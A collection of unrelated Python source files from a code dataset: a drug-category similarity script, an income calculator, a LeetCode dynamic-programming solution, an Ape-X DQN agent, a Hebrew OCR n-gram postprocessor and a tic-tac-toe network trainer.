#print(drugCategories)\n drugCategories = normalizeData(drugCategories)\n #print(drugCategories)\n #print(drugCategories[condition])\n categoryList = drugCategories[condition]\n categoryList1 = [item for item in categoryList if web.is_cat(item)]\n\n NHSList = getDrugCategories(categoryList) + categoryList1\n return list(set(NHSList))\n\n#print(filterDrugsCategoriesNHS(condtions[2]))\n\n\ndef filterDrugsCategoriesHEALTHLINE(condition):\n drugCategories = readDrugCategoryFile('HEALTHLINE')\n #print(drugCategories)\n drugCategories = normalizeData(drugCategories)\n #print(drugCategories)\n #print(drugCategories[condition])\n categoryList = drugCategories[condition]\n categoryList1 = [item for item in categoryList if web.is_cat(item)]\n\n HEALTHLINEList = getDrugCategories(categoryList) + categoryList1\n return list(set(HEALTHLINEList))\n\n#print(filterDrugsCategoriesHEALTHLINE(condtions[2]))\n\ndef filterDrugsCategoriesMAYO(condition):\n drugCategories = readDrugCategoryFile('MAYO')\n #print(drugCategories)\n drugCategories = normalizeData(drugCategories)\n #print(drugCategories)\n #print(drugCategories[condition])\n categoryList = drugCategories[condition]\n categoryList1 = [item for item in categoryList if web.is_cat(item)]\n\n MAYOList = getDrugCategories(categoryList) + categoryList1\n return list(set(MAYOList))\n\n#print(filterDrugsCategoriesMAYO(condtions[2]))\n\ndef filterDrugsCategoriesWEBMD(condition):\n drugCategories = readDrugCategoryFile('WEBMD')\n #print(drugCategories)\n drugCategories = normalizeData(drugCategories)\n #print(drugCategories)\n #print(drugCategories[condition])\n categoryList = drugCategories[condition]\n categoryList1 = [item for item in categoryList if web.is_cat(item)]\n\n WEBMDList = getDrugCategories(categoryList) + categoryList1\n return list(set(WEBMDList))\n\n#print(filterDrugsCategoriesHEALTHLINE(condtions[2]))\n\n\ndef calCosinSimilarity(c1, c2):\n terms = set(c1).union(c2)\n dotprod = sum(c1.get(k, 0) * c2.get(k, 0) for k in terms)\n magA = math.sqrt(sum(c1.get(k, 0)**2 for k in terms))\n magB = math.sqrt(sum(c2.get(k, 0)**2 for k in terms))\n return dotprod / (magA * magB)\n\n\n\n#Gets Most Common Drug Categories\ndef getMostCommonDrugsCategories(condition):\n medications = 
filterDrugsCategoriesMAYO(condition)+ filterDrugsCategoriesHEALTHLINE(condition) + filterDrugsCategoriesWEBMD(condition) + filterDrugsCategoriesNHS(condition)\n commonMeds = FreqDist(medications)\n return [item for (item, x) in commonMeds.most_common(4)]\n\nprint(getMostCommonDrugsCategories(condtions[2]))\n\n\n\n#this function returns two closest websites\ndef similarWebSites(condition):\n cosSim={}\n cosSimValues={}\n\n cosSim[\"webMD\"] = Counter(filterDrugsCategoriesWEBMD(condition))\n cosSim[\"mayoClinic\"] = Counter(filterDrugsCategoriesMAYO(condition))\n cosSim[\"healthline\"] = Counter(filterDrugsCategoriesHEALTHLINE(condition))\n cosSim[\"nhs\"] = Counter(filterDrugsCategoriesNHS(condition))\n #print(nhs)\n #print(webmd)\n a= [(key1,key2)for key1 in cosSim for key2 in cosSim if key1 !=key2]\n b=[(item,calCosinSimilarity(cosSim[item[0]],cosSim[item[1]])) for item in a]\n return max(b,key=itemgetter(1))[0]\n\nprint(similarWebSites(condtions[2]))","sub_path":"project/commonDrugCategories.py","file_name":"commonDrugCategories.py","file_ext":"py","file_size_in_byte":8170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"36801898","text":"currency = input(\"What Currency Do You Use?\\n\")\nrate = float(input(\"How Much Money Do You Earn Per Hour? \\n\"))\nhours = float(input(\"How Many Hours Do You Work Per Day?\\n\"))\ndays = float(input(\"How Many Days Per Month Do You Work?\\n\"))\nannually = float(input(\"How Many Months Per Year Do You Work?\\n\"))\n\nmonth = str((hours * days) * rate)\nmonths = float((hours * days) * rate)\nyear = str(months * annually)\nprint(\"You Earn \" + currency + month + \" Per Month.\")\nprint(\"You Earn \" + currency + year + \" Per Year.\")\nprint(\"Thanks For Using My Income Calc. 
Don't Forget To Follow Me On GitHub.\")","sub_path":"IncomeCalc.py","file_name":"IncomeCalc.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"203068292","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2018/7/8 5:38 PM\n@Author : libing\n@Email : icearl@qq.com\n@File : 115_Distinct Subsequences.py\n@Software: PyCharm\n\"\"\"\n\n\"\"\" Problem: Distinct Subsequences\nGiven a string S and a string T, count how many times T occurs among the subsequences of S.\n\nA subsequence of a string is a new string formed from the original string by deleting some (possibly zero) characters without disturbing the relative positions of the remaining characters. (For example, \"ACE\" is a subsequence of \"ABCDE\" while \"AEC\" is not.)\n\nExample 1:\n\nInput: S = \"rabbbit\", T = \"rabbit\"\nOutput: 3\nExplanation:\n\nAs shown below, there are 3 ways to obtain \"rabbit\" from S.\n(The caret symbol ^ marks the selected letters.)\n\nrabbbit\n^^^^ ^^\nrabbbit\n^^ ^^^^\nrabbbit\n^^^ ^^^\nExample 2:\n\nInput: S = \"babgbag\", T = \"bag\"\nOutput: 5\nExplanation:\n\nAs shown below, there are 5 ways to obtain \"bag\" from S.\n(The caret symbol ^ marks the selected letters.)\n\nbabgbag\n^^ ^\nbabgbag\n^^    ^\nbabgbag\n^    ^^\nbabgbag\n  ^  ^^\nbabgbag\n    ^^^\n\"\"\"\n\n\nclass Solution:\n    \"\"\"\n    My own attempt, using recursion; it exceeds the time limit, so the DP approach below should be used instead.\n    \"\"\"\n    def numDistinct(self, s, t):\n        \"\"\"\n        :type s: str eg: \"babgbag\"\n        :type t: str eg: \"bag\"\n        :rtype: int\n        \"\"\"\n        res_cnt = 0\n        for i in range(len(s)):\n            if s[i] == t[0]:\n                if len(t) == 1:\n                    res_cnt += 1\n                else:\n                    res_cnt += self.numDistinct(s[i + 1:], t[1:])\n            else:\n                continue\n        return res_cnt\n\n# Use this one\nclass Solution:\n    def numDistinct(self, S, T):\n        \"\"\"\n        Idea: https://shenjie1993.gitbooks.io/leetcode-python/115%20Distinct%20Subsequences.html\n        A classic dynamic-programming problem. dp[i][j] is the number of distinct subsequences of T[:j] in S[:i].\n        If S[i-1] and T[j-1] differ, T[:j] can only be matched inside S[:i-1], so dp[i][j] = dp[i-1][j];\n        when S[i-1] equals T[j-1], the two characters can match each other, or S[i-1] can be ignored\n        so that T[j-1] is matched inside S[:i-1], hence dp[i][j] = dp[i - 1][j - 1] + dp[i - 1][j].\n        :type s: str\n        :type t: str\n        :rtype: int\n        \"\"\"\n        # dp table\n        dp = [[0 for j in range(len(T) + 1)] for i in range(len(S) + 1)]\n        # initialize the leftmost column to 1 (an empty T matches exactly once)\n        for i in range(len(S) + 1):\n            dp[i][0] = 1\n        # fill the table following the idea above\n        for i in range(len(S)):\n            for j in range(len(T)):\n                if S[i] == T[j]:\n                    dp[i + 1][j + 1] = dp[i][j+1] + dp[i][j]\n                else:\n                    dp[i+1][j+1] = dp[i][j + 1]\n        return dp[len(S)][len(T)]\n\nif __name__ == \"__main__\":\n    S = \"rabbbit\"\n    T = \"rabbit\"\n    result = Solution().numDistinct(S, T)\n    print(result)","sub_path":"Python/leetcode/115_Distinct Subsequences.py","file_name":"115_Distinct Subsequences.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"322382257","text":"# Copyright 2018 The YARL-Project, All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport copy\nimport numpy as np\n\nfrom yarl.agents import Agent\nfrom yarl.components import CONNECT_ALL, Synchronizable, Merger, Splitter, Memory, DQNLossFunction, PrioritizedReplay, \\\n    Policy\nfrom yarl.spaces import Dict, IntBox, FloatBox, 
BoolBox\n\n\nclass ApexAgent(Agent):\n \"\"\"\n Ape-X is a DQN variant designed for large scale distributed execution where many workers\n share a distributed prioritized experience replay.\n\n Paper: https://arxiv.org/abs/1803.00933\n\n The distinction to standard DQN is mainly that Ape-X needs to provide additional operations\n to enable external updates of priorities. Ape-X also enables per default dueling and double\n DQN.\n \"\"\"\n\n def __init__(self, discount=0.98, memory_spec=None, **kwargs):\n \"\"\"\n Args:\n discount (float): The discount factor (gamma).\n memory_spec (Optional[dict,Memory]): The spec for the Memory to use for the DQN algorithm.\n \"\"\"\n super(ApexAgent, self).__init__(**kwargs)\n\n self.discount = discount\n self.train_time_steps = 0\n\n # Apex always uses prioritized replay (not Memory.from_spec())\n self.memory = PrioritizedReplay.from_spec(memory_spec)\n self.record_space = Dict(states=self.state_space, actions=self.action_space, rewards=float,\n terminals=IntBox(1), add_batch_rank=False)\n\n # The target policy (is synced from the q-net policy every n steps).\n self.target_policy = None\n # The global copy of the q-net (if we are running in distributed mode).\n self.global_qnet = None\n\n # Apex always uses dueling.\n self.policy = Policy(neural_network=self.neural_network, action_adapter_spec=dict(add_dueling_layer=True))\n\n self.merger = Merger(output_space=self.record_space)\n splitter_input_space = copy.deepcopy(self.record_space)\n splitter_input_space[\"next_states\"] = self.state_space\n self.splitter = Splitter(input_space=splitter_input_space)\n self.loss_function = DQNLossFunction(discount=self.discount, double_q=True)\n\n self.assemble_meta_graph()\n self.build_graph()\n\n def _assemble_meta_graph(self, core, *params):\n # Define our interface.\n core.define_inputs(\"states_from_env\", \"external_batch_states\", \"external_batch_next_states\",\n \"states_for_memory\", space=self.state_space.with_batch_rank())\n core.define_inputs(\"actions_for_memory\", \"external_batch_actions\", space=self.action_space.with_batch_rank())\n core.define_inputs(\"rewards_for_memory\", \"external_batch_rewards\", space=FloatBox(add_batch_rank=True))\n core.define_inputs(\"terminals_for_memory\", \"external_batch_terminals\", space=BoolBox(add_batch_rank=True))\n\n #core.define_inputs(\"deterministic\", space=bool)\n core.define_inputs(\"time_step\", space=int)\n core.define_outputs(\"get_actions\", \"insert_records\",\n \"update_from_memory\", \"update_from_external_batch\",\n \"sync_target_qnet\", \"get_batch\", \"get_indices\", \"loss\")\n\n # Add the Q-net, copy it (target-net) and add the target-net.\n self.target_policy = self.policy.copy(scope=\"target-policy\")\n # Make target_policy writable\n self.target_policy.add_component(Synchronizable(), connections=CONNECT_ALL)\n core.add_components(self.policy, self.target_policy)\n # Add an Exploration for the q-net (target-net doesn't need one).\n core.add_components(self.exploration)\n\n # Add our Memory Component plus merger and splitter.\n core.add_components(self.memory, self.merger, self.splitter)\n\n # Add the loss function and optimizer.\n core.add_components(self.loss_function, self.optimizer)\n\n # All external/env states into preprocessor (memory already preprocessed).\n core.connect(\"states_from_env\", (self.preprocessor_stack, \"input\"), label=\"env,s\")\n core.connect(\"external_batch_states\", (self.preprocessor_stack, \"input\"), label=\"ext,s\")\n core.connect(\"external_batch_next_states\", 
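        # the string labels here ("env", "ext", "mem") tag each connection with
        # the data path it serves, so acting, external-batch updates, and
        # memory-batch updates can share one policy network (a reading of the
        # labelled hookups below, not an authoritative YARL description)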
(self.preprocessor_stack, \"input\"), label=\"ext,sp\")\n core.connect((self.preprocessor_stack, \"output\"), (self.policy, \"nn_input\"), label=\"s,sp\")\n\n # Timestep into Exploration.\n core.connect(\"time_step\", (self.exploration, \"time_step\"))\n\n # Policy output into Exploration -> into \"actions\".\n core.connect((self.policy, \"sample_deterministic\"),\n (self.exploration, \"sample_deterministic\"), label=\"env\")\n core.connect((self.policy, \"sample_stochastic\"),\n (self.exploration, \"sample_stochastic\"), label=\"env\")\n core.connect((self.exploration, \"action\"), \"get_actions\")\n #core.connect((self.exploration, \"do_explore\"), \"do_explore\")\n\n # Insert records into memory via merger.\n core.connect(\"states_for_memory\", (self.preprocessor_stack, \"input\"), label=\"to_mem\")\n core.connect((self.preprocessor_stack, \"output\"), (self.merger, \"/states\"), label=\"to_mem\")\n for in_ in [\"actions\", \"rewards\", \"terminals\"]:\n core.connect(in_+\"_for_memory\", (self.merger, \"/\"+in_))\n core.connect((self.merger, \"output\"), (self.memory, \"records\"))\n core.connect((self.memory, \"insert_records\"), \"insert_records\")\n\n # Learn from Memory via get_batch and Splitter.\n core.connect(self.update_spec[\"batch_size\"], (self.memory, \"num_records\"))\n core.connect((self.memory, \"get_records\"), (self.splitter, \"input\"), label=\"mem\")\n\n # To get obtain a batch and its indices.\n core.connect((self.memory, \"get_records\"), \"get_batch\")\n core.connect((self.memory, \"record_indices\"), \"get_indices\")\n\n core.connect((self.splitter, \"/states\"), (self.policy, \"nn_input\"), label=\"mem,s\")\n core.connect((self.splitter, \"/actions\"), (self.loss_function, \"actions\"))\n core.connect((self.splitter, \"/rewards\"), (self.loss_function, \"rewards\"))\n core.connect((self.splitter, \"/terminals\"), (self.loss_function, \"terminals\"))\n core.connect((self.splitter, \"/next_states\"), (self.target_policy, \"nn_input\"), label=\"mem,sp\")\n core.connect((self.splitter, \"/next_states\"), (self.policy, \"nn_input\"), label=\"mem,sp\")\n\n # Only send ext and mem labelled ops into loss function.\n q_values_socket = \"q_values\"\n core.connect((self.policy, q_values_socket), (self.loss_function, \"q_values\"), label=\"ext,mem,s\")\n core.connect((self.target_policy, q_values_socket), (self.loss_function, \"qt_values_s_\"), label=\"ext,mem\")\n core.connect((self.policy, q_values_socket), (self.loss_function, \"q_values_s_\"), label=\"ext,mem,sp\")\n\n # Connect the Optimizer.\n core.connect((self.loss_function, \"loss\"), (self.optimizer, \"loss\"))\n core.connect((self.loss_function, \"loss\"), \"loss\")\n core.connect((self.policy, \"_variables\"), (self.optimizer, \"vars\"))\n core.connect((self.optimizer, \"step\"), \"update_from_memory\", label=\"mem\")\n core.connect((self.optimizer, \"step\"), \"update_from_external_batch\", label=\"ext\")\n\n # Connect loss to updating priority values and indices to update.\n core.connect((self.loss_function, \"loss_per_item\"), (self.memory, \"update\"))\n # TODO correct?\n core.connect((self.memory, \"record_indices\"), (self.memory, \"indices\"))\n\n # Add syncing capability for target-net.\n core.connect((self.policy, \"_variables\"), (self.target_policy, \"_values\"))\n core.connect((self.target_policy, \"sync\"), \"sync_target_qnet\")\n\n def get_action(self, states, deterministic=False):\n batched_states = self.state_space.batched(states)\n remove_batch_rank = batched_states.ndim == 
np.asarray(states).ndim + 1\n # Increase timesteps by the batch size (number of states in batch).\n self.timesteps += len(batched_states)\n actions = self.graph_executor.execute(\n \"get_actions\", inputs=dict(states_from_env=batched_states, time_step=self.timesteps)\n )\n\n if remove_batch_rank:\n return actions[0]\n return actions\n\n def get_batch(self):\n \"\"\"\n Samples a batch from the priority replay memory.\n\n Returns:\n batch, ndarray: Sample batch and indices sampled.\n \"\"\"\n batch, indices = self.graph_executor.execute(sockets=[\"get_batch\", \"get\"])\n\n # Return indices so we later now which priorities to update.\n return batch, indices\n\n def update_priorities(self, indices, loss):\n \"\"\"\n Updates priorities of provided indices in replay memory via externally\n provided loss.\n\n Args:\n indices (ndarray): Indices to update in replay memory.\n loss (ndarray): Loss values for indices.\n \"\"\"\n self.graph_executor.execute(\n sockets=[\"sample_indices\", \"sample_losses\"],\n inputs=dict(sample_indices=indices, sample_losses=loss)\n )\n\n def _observe_graph(self, states, actions, internals, rewards, terminals):\n self.graph_executor.execute(\"insert_records\", inputs=dict(\n states_for_memory=states,\n actions_for_memory=actions,\n rewards_for_memory=rewards,\n terminals_for_memory=terminals\n ))\n\n def update(self, batch=None):\n # In apex, syncing is based on num steps trained, not steps sampled.\n if (self.train_time_steps - 1) % self.update_spec[\"sync_interval\"] == 0:\n self.graph_executor.execute(\"sync_target_qnet\")\n if batch is None:\n _, loss = self.graph_executor.execute([\"update_from_memory\", \"loss\"])\n else:\n batch_input = dict(\n external_batch_states=batch[\"states\"],\n external_batch_actions=batch[\"actions\"],\n external_batch_rewards=batch[\"rewards\"],\n external_batch_terminals=batch[\"terminals\"],\n external_batch_next_states=batch[\"next_states\"]\n )\n _, loss = self.graph_executor.execute(\n [\"update_from_external_batch\", \"loss\"], inputs=batch_input\n )\n self.train_time_steps += 1\n return loss\n\n def __repr__(self):\n return \"ApexAgent\"\n","sub_path":"yarl/agents/apex_agent.py","file_name":"apex_agent.py","file_ext":"py","file_size_in_byte":11120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"49666940","text":"from os.path import join, abspath\nfrom sliding_window import SlidingWindow\nimport numpy as np\nimport statistics\n\nFINAL_OUTPUT_SAVE_PATH = \"../data/program_output/\"\nFINAL_NAME = \"output\"\nCHAR_PROB_THRESHOLD = 0.6\n\nfn = join(abspath('..'), 'ngrams.npz')\nchar_map = {'Alef' : 0, \n 'Ayin' : 1, \n 'Bet' : 2, \n 'Dalet' : 3, \n 'Gimel' : 4, \n 'He' : 5, \n 'Het' : 6, \n 'Kaf' : 7, \n 'Kaf-final' : 8, \n 'Lamed' : 9, \n 'Mem' : 10, \n 'Mem-medial' : 11, \n 'Nun-final' : 12, \n 'Nun-medial' : 13, \n 'Pe' : 14, \n 'Pe-final' : 15, \n 'Qof' : 16, \n 'Resh' : 17, \n 'Samekh' : 18, \n 'Shin' : 19, \n 'Taw' : 20, \n 'Tet' : 21, \n 'Tsadi-final' : 22, \n 'Tasdi-final' : 22, # catch typo in dataset\n 'Tsadi-medial' : 23, \n 'Tsadi' : 23, # catch typo in dataset\n 'Waw' : 24, \n 'Yod' : 25, \n 'Zayin' : 26\n }\n\nhebrew_map = {\n 0: u'\\u05D0',\n 1: u'\\u05E2',\n 2: u'\\u05D1',\n 3: u'\\u05D3',\n 4: u'\\u05D2',\n 5: u'\\u05D4',\n 6: u'\\u05D7',\n 7: u'\\u05DB',\n 8: u'\\u05DA',\n 9: u'\\u05DC',\n 10: u'\\u05DD',\n 11: u'\\u05DE',\n 12: u'\\u05DF',\n 13: u'\\u05E0',\n 14: u'\\u05E4',\n 15: u'\\u05E3',\n 16: u'\\u05E7',\n 17: u'\\u05E8',\n 18: u'\\u05E1',\n 19: 
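    # the values are Unicode codepoints for the Hebrew glyphs; rev_hebrew_map,
    # built right after this dict, inverts the mapping because YOLO already
    # returns glyphs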
u'\\u05E9',\n 20: u'\\u05EA',\n 21: u'\\u05D8',\n 22: u'\\u05E5',\n 23: u'\\u05E6',\n 24: u'\\u05D5',\n 25: u'\\u05D9',\n 26: u'\\u05D6'\n }\n\n## needed for the final program, as YOLO now returns hebrew\nrev_hebrew_map = {}\nfor key, val in hebrew_map.items(): \n rev_hebrew_map[val] = key\n\n\nclass Bayesian_processor():\n \"\"\"docstring for Bayesian_processor\"\"\"\n def __init__(self):\n self.ngrams = np.load(fn)\n self.unigrams = self.ngrams['unigrams']\n self.bigrams = self.ngrams['bigrams']\n self.trigrams = self.ngrams['trigrams']\n\n ## parameters for simple interpolation\n self.TRIGRAM_IMPORTANCE = 0.33\n self.BIGRAM_IMPORTANCE = 0.33\n self.UNIGRAM_IMPORTANCE = 1.0 - self.TRIGRAM_IMPORTANCE - self.BIGRAM_IMPORTANCE\n self.MINIMAL_SAME_CHAR_SEQ_LEN = 3\n\n def process_word(self, predicted_word):\n \"\"\"\n P( z | xy) = lambda * P(xyz) / P(xy) + mu * P(yz) / P(y) + (1.0 - lambda - mu) * P(z) / P(sum unigrams) \n \"\"\"\n posterior_word = np.zeros((len(predicted_word), len(self.unigrams)), dtype=np.double)\n\n ## forward pass\n for idx, prior_softmax in enumerate(predicted_word):\n if idx > 1: ## use trigrams\n first_softmax = predicted_word[idx-2]\n second_softmax = predicted_word[idx-1]\n nr_classes = len(self.unigrams)\n\n\n for third_letter in range(nr_classes):\n letter_probs = []\n for second_letter in range(nr_classes):\n for first_letter in range(nr_classes):\n trigram_divisor = self.bigrams[first_letter, second_letter] ## bigram-prob used for division\n\n trigram_prob = self.trigrams[first_letter, second_letter, third_letter] / trigram_divisor\n bigram_prob = self.bigrams[second_letter, third_letter] / self.unigrams[second_letter]\n unigram_prob = self.unigrams[third_letter] / np.sum(self.unigrams)\n\n prob = trigram_prob * self.TRIGRAM_IMPORTANCE + bigram_prob * self.BIGRAM_IMPORTANCE +\\\n unigram_prob * self.UNIGRAM_IMPORTANCE\n\n # take priors of all letters into account\n prob *= prior_softmax[third_letter] * second_softmax[second_letter] * first_softmax[first_letter]\n\n letter_probs.append(prob)\n posterior_word[idx, third_letter] += max(letter_probs)\n\n ## backward pass\n for idx in range(len(predicted_word) - 3, -1, -1):\n prior_softmax = predicted_word[idx]\n third_softmax = predicted_word[idx+2]\n second_softmax = predicted_word[idx+1]\n nr_classes = len(self.unigrams)\n\n\n for first_letter in range(nr_classes):\n letter_probs = []\n for second_letter in range(nr_classes):\n for third_letter in range(nr_classes):\n trigram_divisor = self.bigrams[second_letter, third_letter] ## bigram-prob used for division\n\n trigram_prob = self.trigrams[first_letter, second_letter, third_letter] / trigram_divisor\n bigram_prob = self.bigrams[first_letter, second_letter] / self.unigrams[second_letter]\n unigram_prob = self.unigrams[first_letter] / np.sum(self.unigrams)\n\n prob = trigram_prob * self.TRIGRAM_IMPORTANCE + bigram_prob * self.BIGRAM_IMPORTANCE +\\\n unigram_prob * self.UNIGRAM_IMPORTANCE\n\n prob *= prior_softmax[first_letter] * second_softmax[second_letter] * third_softmax[third_letter]\n\n letter_probs.append(prob)\n posterior_word[idx, first_letter] += max(letter_probs)\n return posterior_word\n\n def normalize_posteriors(self, word):\n \"\"\"Normalize probabilites per letter\n (e.g., [0.1, 0.2, 0.1] to [0.25, 0.5, 0.25])\n \"\"\"\n return [[p / sum(posteriors) for p in posteriors]\n for posteriors in word]\n\n def print_word(self, word, title=None):\n if title is not None:\n print(f\"{title}:\")\n\n # Word as string\n 
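        # letter.index(max(letter)) is an argmax over the 27 class posteriors;
        # hebrew_map then turns the winning index back into a glyph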
print(''.join([hebrew_map[letter.index(max(letter))] for letter in word]))\n\n # Word as separate probabilities\n [print(f\"{hebrew_map[letter.index(max(letter))]}\\t(p = {max(letter):.2f})\") for letter in word]\n print()\n\n def append_word_to_file(self, word, file):\n # TBA\n wordstring = ''.join([hebrew_map[letter.index(max(letter))]\n for letter in word])\n\n def probs_to_one_hot(self, arr):\n arr_len = len(arr)\n arr = np.array(arr)\n new = np.zeros(arr_len, dtype = int)\n new[np.argmax(arr)] = 1\n new = new.tolist()\n return new\n\n # This function will produce output such that each character in a same character sequence only occurs once. \n # This function takes the mean of the same char sequence\n def filter_on_seq_of_same_chars_2(self, probabilities):\n first_char_flag = False # Flag to determine first char of same char sequence\n one_hots = []\n trash_indices = []\n out_probs = []\n #convert softmax arrays to one hot arrays\n for arr in probabilities:\n one_hot = self.probs_to_one_hot(arr)\n one_hots.append(one_hot)\n first_char_mean = probabilities[0]\n for idx in range(0, len(one_hots)):\n try:\n if one_hots[idx] == one_hots[idx+1]: #Next char is the same as current one\n trash_indices.append(idx+1)\n first_char_flag = True\n else:\n first_char_flag = False\n first_char_mean = probabilities[idx]\n\n if first_char_flag:\n first_char_mean = [statistics.mean(k) for k in zip(first_char_mean,probabilities[idx+1])] # Compute mean of first char of same char seq. and the char ahead\n else:\n out_probs.append(first_char_mean) \n except:\n pass\n return out_probs\n\n # This function will produce output such that each character in a same character sequence only occurs once. \n def filter_on_seq_of_same_chars(self, probabilities):\n one_hots = []\n trash_indices = []\n #convert softmax arrays to one hot arrays\n for arr in probabilities:\n one_hot = self.probs_to_one_hot(arr)\n one_hots.append(one_hot)\n for idx in range(0, len(one_hots)):\n try:\n if one_hots[idx] == one_hots[idx+1]:\n trash_indices.append(idx+1)\n except:\n pass\n probabilities = [j for i, j in enumerate(probabilities) if i not in trash_indices]\n return probabilities\n\n # This function filters the character sequence on single occuring characters in a sequence.\n # These characters are regarded as noise. E.g. in the ence AAABAACCCCCC, B would be regarded as noise\n # The function also downscales the char array such that only same char sequences with length >= self.MINIMAL_SAME_CHAR_SEQ_LEN\n # are kept. 
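    # Worked toy case of the intent stated above: for the argmax sequence
    # A A A B A A C C C C C C the lone B disagrees with its neighbourhood and
    # is discarded, so only runs of length >= MINIMAL_SAME_CHAR_SEQ_LEN survive.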
\n def sequence_denoiser(self, probabilities):\n one_hots = []\n trash_indices = []\n #convert softmax arrays to one hot arrays\n for arr in probabilities:\n one_hot = self.probs_to_one_hot(arr)\n one_hots.append(one_hot)\n for idx in range(0, len(one_hots)):\n try:\n for kernel_idx in range(1, self.MINIMAL_SAME_CHAR_SEQ_LEN):\n if not (one_hots[idx] == one_hots[idx+kernel_idx+1]):\n trash_indices.append(idx+kernel_idx+1)\n except:\n pass\n probabilities = [j for i, j in enumerate(probabilities) if i not in trash_indices]\n return probabilities\n\n def apply_threshold(self, probabilities):\n new_probs = []\n for softmax in probabilities:\n if softmax[np.array(softmax).argmax()] > CHAR_PROB_THRESHOLD:\n new_probs.append(softmax)\n return new_probs\n\n def apply_postprocessing(self, probabilities):\n probabilities = self.sequence_denoiser(probabilities)\n probabilities = self.filter_on_seq_of_same_chars(probabilities)\n probabilities = self.apply_threshold(probabilities)\n probabilities.reverse() # This way the n-grams will be applied from right to left\n posteriors = self.process_word(probabilities)\n posteriors = self.normalize_posteriors(posteriors)\n posteriors = self.filter_on_seq_of_same_chars(posteriors) # Filter on same-char-sequences, these may be produced by the n-grams post processing\n posteriors.reverse() # This way the n-grams will be applied from right to left\n final_sentence = \"\"\n for idx, letter_probs in enumerate(posteriors):\n best_letter_val = max(letter_probs)\n best_letter_index = letter_probs.index(best_letter_val)\n final_sentence += hebrew_map[best_letter_index]\n return final_sentence\n\n\nif __name__ == \"__main__\":\n # When running this script standalone, use this example:\n\n # Construct mock prediction softmax (of length (n x 27) )\n processor = Bayesian_processor()\n sw = SlidingWindow()\n image_file = \"../data/backup_val_lines/line1.png\"\n sw.load_image(image_file)\n\n predicted_sentence = sw.get_letters()\n sentence = processor.apply_postprocessing(predicted_sentence)\n","sub_path":"src/bayesian_postp.py","file_name":"bayesian_postp.py","file_ext":"py","file_size_in_byte":11724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"518198165","text":"import numpy as np\nfrom importlib import import_module\nimport signal\nimport time\nfrom termcolor import colored\nimport h5py\n\ngame = import_module(\"game\")\nai = import_module(\"ai\")\nann = import_module(\"ann\")\n\ntic_ann = ann.TicNN()\n\ntrain_input_data = []\ntrain_output_prob = []\ntrain_adv = []\n\ngame_data_count = 0\n\ngame_losses = 0\ngame_draws = 0\n\ndef cb(board_arr, player_id):\n\n\tglobal train_input_data, game_data_count\n\n\tif player_id == 1:\n\n\t\treturn ai.ticplay(board_arr, player_id)\n\n\tcell_index = tic_ann.ticplay(board_arr, player_id)\n\n\tmove = np.transpose(np.unravel_index(cell_index, (3,3)))[0]\n\n\tflat_board = np.copy(board_arr).flatten()\n\n\ttrain_input_data.append(flat_board)\n\n\toutput_prob = np.zeros((1,9))\n\toutput_prob[0,cell_index] = 1.0\n\n\ttrain_output_prob.append(output_prob.flatten())\n\n\tgame_data_count += 1\n\n\treturn move\n\ninterrupted = {'value':False}\n\ndef signal_handler(signal, frame):\n\tinterrupted['value'] = True\n\ttic_ann.stop_train()\n\nsignal.signal(signal.SIGINT, signal_handler)\n\n\nMAX_GAMES = 2\n\ngame_count = 0\n\nwhile game_count < MAX_GAMES and not interrupted['value']:\n\n\tprint()\n\tprint(colored(\"Started game: {}\".format(game_count+1), 'blue'))\n\n\ttic_game = 
game.TicGame(cb)\n\ttic_game.set_render(True)\n\tgame_result = tic_game.start()\n\n\tscore = 1\n\n\tif game_result == 1:\n\t\t\n\t\tgame_losses += 1\n\t\tscore = -1\n\n\telif game_result == 9:\n\t\tgame_draws += 1\n\n\tgame_adv = np.full((game_data_count,), score)\n\ttrain_adv.append(game_adv.flatten())\n\n\tgame_data_count = 0\n\n\tgame_count += 1\n\nprint()\nprint(colored(\"{} Game loss\".format(game_losses), 'red'))\nprint(colored(\"{} Game draw\".format(game_draws), 'green'))\nprint()\n\nprint(\"Saving data...\")\n\ntrain_input_data = np.array(train_input_data)\ntrain_output_prob = np.array(train_output_prob)\ntrain_adv = np.hstack(np.array(train_adv))\ntrain_adv = np.expand_dims(train_adv, 1)\n\n\ndef append_dataset(dset, data):\n\t\n\tfirst_index = dset.shape[0]\n\n\tdset.resize((dset.shape[0] + data.shape[0], dset.shape[1]))\n\tdset[first_index:,:] = data\n\n\nf = h5py.File(\"train_data.hdf5\")\n\nif \"train_data\" in f:\n\n\tgrp = f[\"train_data\"]\n\t\n\tinput_dset = grp[\"input\"]\n\toutput_prob_dset = grp[\"output_prob\"]\n\ttrain_adv_dset = grp[\"output_adv\"]\n\n\tappend_dataset(input_dset, train_input_data)\n\tappend_dataset(output_prob_dset, train_output_prob)\n\tappend_dataset(train_adv_dset, train_adv)\n\n\nelse:\n\n\tgrp = f.create_group(\"train_data\")\n\n\tinput_dset = grp.create_dataset(\"input\", train_input_data.shape, maxshape=(None, None))\n\tinput_dset[...] = train_input_data\n\n\toutput_prob_dset = grp.create_dataset(\"output_prob\", train_output_prob.shape, maxshape=(None, None))\n\toutput_prob_dset[...] = train_output_prob\n\n\ttrain_adv_dset = grp.create_dataset(\"output_adv\", train_adv.shape, maxshape=(None, None))\n\ttrain_adv_dset[...] = train_adv\n\nf.close()\n\nprint(\"Data saved!\")\nprint()\n\nprint(\"Saving ANN...\")\n\ntic_ann.save(\"tic.net\")\n\nprint(\"ANN 